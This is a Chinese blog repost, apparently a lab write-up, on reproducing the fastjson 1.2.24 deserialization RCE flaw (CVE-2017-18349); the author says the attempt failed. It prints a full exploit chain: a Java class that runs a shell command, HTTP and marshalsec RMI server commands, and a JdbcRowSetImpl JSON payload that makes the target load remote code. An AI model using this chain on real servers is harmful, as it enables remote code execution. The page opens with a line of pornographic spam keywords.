日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)

發布時間:2024/3/12 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞背景

Pippo是一款基于Java的Web框架。FastjsonEngine是其中的一個JSON處理引擎。Fastjson是其中的一個基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。遠程攻擊者可通過發送特制的JSON請求利用該漏洞執行任意代碼。

漏洞復現

首先新建java腳本:

// javac TouchFile.java import java.lang.Runtime; import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"touch", "/tmp/success"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}} }

使用javac TouchFile.java生成class文件

在該目錄下用python個簡便的HTTP

python2 -m SimpleHTTPServer 7777 或 python3 -m http.server 7777

marshalsec項目,啟動一個RMI服務器,監聽9999端口,并制定加載遠程類TouchFile.class:(需要mvn編譯marshalsec)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://your_ip:7777/#TouchFile" 9999

再向靶機發送payload,帶上剛剛開的RMI

POST / HTTP/1.1 Host: your-ip:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 160{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your_ip:9999/TouchFile","autoCommit":true} }

死活復現不出來,有沒有大佬幫幫孩子,已經哭傻了…
報錯信息:


總結

以上是生活随笔為你收集整理的fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。